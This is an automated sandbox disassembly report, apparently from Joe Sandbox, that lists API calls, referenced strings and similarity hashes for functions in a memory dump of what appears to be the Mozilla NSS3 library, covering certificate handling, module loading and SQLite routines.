Part of subcall function 6C7CFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C774101,00000000,?,?,?,6C771666,?,?), ref: 6C7CFCF2

SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C7813D1
PK11_HashBuf.NSS3(?,?,?,?), ref: 6C7813F5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C781408
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C78143F
PK11_HashBuf.NSS3(?,?,?,?), ref: 6C78145A
SECITEM_CompareItem_Util.NSS3(00000000,?), ref: 6C781473
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C781480
SECITEM_AllocItem_Util.NSS3(00000000), ref: 6C7814C1
PK11_HashBuf.NSS3(?,?,?,?,?,00000000,00000000), ref: 6C7814DB
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000,00000000), ref: 6C7814EA
CERT_DestroyCertificate.NSS3(00000000), ref: 6C7814F9

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C781522
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C78153B
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78155B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7812B4

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

CERT_DecodeOidSequence.NSS3(?), ref: 6C7812EB
SECOID_FindOID_Util.NSS3(00000000), ref: 6C781306
PR_SetError.NSS3(FFFFE090,00000000), ref: 6C781331
free.MOZGLUE(?), ref: 6C781346
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C781357
CERT_FindCertIssuer.NSS3(?,?,?,0000000B), ref: 6C78137D
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C781570
PR_Now.NSS3 ref: 6C781588
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7815D3
PR_Now.NSS3 ref: 6C781623
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C78164F
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C781662
PR_GetCurrentThread.NSS3 ref: 6C781678

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Error$Compare$CurrentThread$ArenaZfree$DecodeDestroyHash$Arena_GeneralizedQuickTimeTime_Value$AllocAlloc_CertificateFindK11_$CertEqual_FreeItems$CriticalEnterLookupSectionTableUnlockfree$AllocateArrayCertsConstCopyImportInitInteger_IssuerLockPoolPublicSequencecallocmemcmpmemcpy
String ID:
API String ID: 782668047-0
Opcode ID: 2a588ac0d072b7735ba7d6258e5cd455e684afa8eeb4a2d758672815cb23bbe1
Instruction ID: 719ae0613bedf94e7ad400f691aa33e83a40fed17c9418beddeec85842212451
Opcode Fuzzy Hash: 2a588ac0d072b7735ba7d6258e5cd455e684afa8eeb4a2d758672815cb23bbe1
Instruction Fuzzy Hash: C9921571A0A3419FE710CF28DE44B5B77E4AF84358F14493CEA9997B61E731E848CB92

Function 6C786E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D2120,6C787E60), ref: 6C786EBC
TlsGetValue.KERNEL32 ref: 6C786EDF
EnterCriticalSection.KERNEL32(?), ref: 6C786EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C786F25

Part of subcall function 6C75A900: TlsGetValue.KERNEL32(00000000,?,6C8D14E4,?,6C6F4DD9), ref: 6C75A90F
Part of subcall function 6C75A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C75A94F

PR_Unlock.NSS3 ref: 6C786F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C786FA9
TlsGetValue.KERNEL32 ref: 6C7870B4
EnterCriticalSection.KERNEL32(?), ref: 6C7870C8
PR_CallOnce.NSS3(6C8D24C0,6C7C7590), ref: 6C787104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787117
SECOID_Init.NSS3 ref: 6C787128
PORT_Alloc_Util.NSS3(00000057), ref: 6C78714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C78717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7871A9
PR_NotifyAllCondVar.NSS3 ref: 6C7871CF
PR_Unlock.NSS3 ref: 6C7871DD
free.MOZGLUE(?), ref: 6C7871EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C787208
free.MOZGLUE(00000000), ref: 6C787221
free.MOZGLUE(00000001), ref: 6C787235
TlsGetValue.KERNEL32 ref: 6C78724A
EnterCriticalSection.KERNEL32(?), ref: 6C78725E
PR_NotifyCondVar.NSS3 ref: 6C787273
PR_Unlock.NSS3 ref: 6C787281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7872E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C787372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C8C0148,,defaultModDB,internalKeySlot), ref: 6C7874CC
free.MOZGLUE(00000000), ref: 6C787513
free.MOZGLUE(00000000), ref: 6C78751B
free.MOZGLUE(00000000), ref: 6C787528
free.MOZGLUE(00000000), ref: 6C78753C
free.MOZGLUE(00000000), ref: 6C787550
free.MOZGLUE(00000000), ref: 6C787561
free.MOZGLUE(00000000), ref: 6C787572
free.MOZGLUE(00000000), ref: 6C787583
free.MOZGLUE(00000000), ref: 6C787594
free.MOZGLUE(00000000), ref: 6C7875A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7875BD
free.MOZGLUE(00000000), ref: 6C7875C8
free.MOZGLUE(00000000), ref: 6C7875F1
PR_NewLock.NSS3 ref: 6C787636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C787686
PR_NewLock.NSS3 ref: 6C7876A2

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7876B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C787707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C78771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C787731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C78774A
DeleteCriticalSection.KERNEL32(?), ref: 6C787770
free.MOZGLUE(?), ref: 6C787779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C78779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7877AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7877C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7877DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C787821
PORT_Alloc_Util.NSS3(?), ref: 6C787837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C78785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C78786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878AC
free.MOZGLUE(00000000), ref: 6C7878BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7878F3
free.MOZGLUE(00000000), ref: 6C7878FC
free.MOZGLUE(00000000), ref: 6C78791C

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

kbi., xrefs: 6C787886
extern:, xrefs: 6C78772B
rdb:, xrefs: 6C787744
,defaultModDB,internalKeySlot, xrefs: 6C78748D, 6C7874AA
NSS Internal Module, xrefs: 6C7874A2, 6C7874C6
Spac, xrefs: 6C787389
sql:, xrefs: 6C7876FE
dbm:, xrefs: 6C787716
dll, xrefs: 6C78788E
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7874C7

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction ID: 3ccd983a67b0681726c4798d83db760b87975cbd48aaea6c23cfc07634b254a3
Opcode Fuzzy Hash: 59ceca15c006276a158a829ad79c7e4c5c4fc9edc457764d1f10a4d53debfb7e
Instruction Fuzzy Hash: 2852D4B1F022059BEF219F64DE097AA7BB4AF0630CF144434FE1AA6A51E731E954CBD1

Function 6C796D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C89A8EC,0000006C), ref: 6C796DC6
memcpy.VCRUNTIME140(?,6C89A958,0000006C), ref: 6C796DDB
memcpy.VCRUNTIME140(?,6C89A9C4,00000078), ref: 6C796DF1
memcpy.VCRUNTIME140(?,6C89AA3C,0000006C), ref: 6C796E06
memcpy.VCRUNTIME140(?,6C89AAA8,00000060), ref: 6C796E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C796E38

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C796E76
TlsGetValue.KERNEL32 ref: 6C79726F
EnterCriticalSection.KERNEL32(?), ref: 6C797283

Strings

!, xrefs: 6C797123

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction ID: 308542ffa5ec354283845bb2f09da9896fcdcabb97360432bc6dd666d18b238c
Opcode Fuzzy Hash: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction Fuzzy Hash: 5F729E75D052199FDF60DF28DD88B9ABBB5BF49308F1041A9D80DA7701EB31AA84CF91

Function 6C75E6E0 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 452stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,6C75DA6A,?,00000000,?,?), ref: 6C75E6FF
sqlite3_initialize.NSS3(?,?,00000000,?,6C75DA6A,?,00000000,?,?), ref: 6C75E76B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6C75DA6F,///,00000003,?,?,00000000), ref: 6C75E7AC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(6C75DA71,///,00000003), ref: 6C75E7C8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75E8E8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75E908
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C75E921
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75E978
memcmp.VCRUNTIME140(?,?,6C75DA6A), ref: 6C75E991
sqlite3_initialize.NSS3(?,?,00000000,?,6C75DA6A,?,00000000,?,?), ref: 6C75E9FA
memcpy.VCRUNTIME140(?,6C75DA6A,00000000,?,?,00000000), ref: 6C75EA3A
sqlite3_initialize.NSS3(?,?,00000000), ref: 6C75EA55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C75EABA
sqlite3_mprintf.NSS3(no such %s mode: %s,6C8AE039,?), ref: 6C75EB9F
sqlite3_free.NSS3(000000FC,?,?,?,?,00000000), ref: 6C75EBDB
sqlite3_mprintf.NSS3(no such vfs: %s,?,?,?,00000000), ref: 6C75EC1A
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,//localhost/,0000000C), ref: 6C75EC2E

Strings

no such %s mode: %s, xrefs: 6C75EB9A
file, xrefs: 6C75E738
mode, xrefs: 6C75EC58
///, xrefs: 6C75E7A3, 6C75E7C2
//localhost/, xrefs: 6C75EC26
%s mode not allowed: %s, xrefs: 6C75ECB7
no such vfs: %s, xrefs: 6C75EC15
cach, xrefs: 6C75E93A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strlen$sqlite3_initializestrncmp$sqlite3_mprintf$memcmpmemcpysqlite3_freestrcmp
String ID: %s mode not allowed: %s$///$//localhost/$cach$file$mode$no such %s mode: %s$no such vfs: %s
API String ID: 3798319595-1352301890
Opcode ID: 70d1d114b03f68435bd51fd002aee0260ebcccc8e7700500089ed64d7ebb385c
Instruction ID: 3ca9cf95d3a2c59220207d1e68aa33e13ead58e12fa4d92fc99eb52faa270f0d
Opcode Fuzzy Hash: 70d1d114b03f68435bd51fd002aee0260ebcccc8e7700500089ed64d7ebb385c
Instruction Fuzzy Hash: 23F136B1E0521D8FEF10CF65CA417AEBBB1BF05308F980539D86267A81DB39A915C7D1

Function 6C718460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C7184FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C7188BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C7188CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7188E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C7188F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C718914

Part of subcall function 6C7031C0: sqlite3_initialize.NSS3 ref: 6C7031D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C718A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C718A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C718A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C718B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C718B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C718BAD

Strings

cannot limit WAL size: %s, xrefs: 6C719188

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: cb6eece3a62312dc592bafc52c72683b24232702fc6b592182c15369d00e7318
Instruction ID: 89f8d58d9b81f0dcdcd13cf548d263e75119c3a8e45f4ebb4a8ac2bbd9628b94
Opcode Fuzzy Hash: cb6eece3a62312dc592bafc52c72683b24232702fc6b592182c15369d00e7318
Instruction Fuzzy Hash: 38928F75A083019FD704CF29C980A5AB7F1FFC9318F198A2DE99987B52D731E945CB82

Function 6C7DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C7DACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C7DACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C7DAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7DADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADF0

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7DB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C7DB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7DB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB40C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction ID: e27f82db3c0c3700629e5e64354221eabc0f9c98c2d9e67cd2aca0100eb8d7c2
Opcode Fuzzy Hash: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction Fuzzy Hash: BE22DE71A04301AFE710CF14CE49B9A77E1AF84308F25893CE8595B792E732F859CB96

Function 6C764420 Relevance: 37.9, APIs: 10, Strings: 11, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C764EE3

Strings

start of , xrefs: 6C76517A
40f-21a-21d, xrefs: 6C7644D0
an index, xrefs: 6C764D53, 6C764E86
-, xrefs: 6C764FBA
a generated column, xrefs: 6C764D58, 6C764E8B
w=vl, xrefs: 6C7647FB
second, xrefs: 6C764BCA
weekday , xrefs: 6C7654AB
w=vl, xrefs: 6C764431, 6C764E25, 6C76533D, 6C765536, 6C7655A0, 6C764A83, 6C764A99, 6C765313, 6C765325, 6C764CFC, 6C764A8C, 6C7651AC, 6C7648B9, 6C7646CD, 6C764786, 6C7648D5, 6C76490D, 6C765404, 6C765411, 6C76541E, 6C765365, 6C76537B, 6C76536E, 6C76542A, 6C765466, 6C7653C9, 6C765211, 6C764BA1, 6C765013, 6C76521D, 6C764C69, 6C76528B, 6C764691, 6C765058, 6C764E5E, 6C764FA4, 6C764FEB, 6C764FDF, 6C764F9D, 6C764E77, 6C764EDF, 6C764576, 6C764F90
a CHECK constraint, xrefs: 6C764D62, 6C764D6D, 6C764E95, 6C764EA0
non-deterministic use of %s() in %s, xrefs: 6C764D71, 6C764EA4

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $w=vl$w=vl$weekday
API String ID: 39653677-2058574677
Opcode ID: f95cc334380537f1609f7336f764dd1d13fd7f78067e1149d3d6517f9277c9e6
Instruction ID: 45763fa712dde4b088e5ad0db191c1c0b8854fcb817c06009312de74eeb40369
Opcode Fuzzy Hash: f95cc334380537f1609f7336f764dd1d13fd7f78067e1149d3d6517f9277c9e6
Instruction Fuzzy Hash: 41A225316087848FD721CF3AC260266BBE2AF86358F148A6DECE55BF42D735D886D741

Function 6C75ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C75ED38

Part of subcall function 6C6F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C75EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C75EFE4

Part of subcall function 6C81DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C6F5001,?,00000003,00000000), ref: 6C81DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F129
sqlite3_mprintf.NSS3(optimize), ref: 6C75F1D1
sqlite3_free.NSS3(?), ref: 6C75F368

Strings

porter, xrefs: 6C75ED97
fts3_tokenizer, xrefs: 6C75EE1A, 6C75EEA8
snippet, xrefs: 6C75EF05, 6C75EF37, 6C75EF7C
fts3tokenize, xrefs: 6C75F30F
offsets, xrefs: 6C75EFAF, 6C75EFDF, 6C75F01F
fts4, xrefs: 6C75F2AD
unicode61, xrefs: 6C75EDB5
fts3, xrefs: 6C75F247
simple, xrefs: 6C75ED79
matchinfo, xrefs: 6C75F04F, 6C75F082, 6C75F0C2, 6C75F0F2, 6C75F124, 6C75F169
optimize, xrefs: 6C75F199, 6C75F1CC, 6C75F211
fts4aux, xrefs: 6C75ECF9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
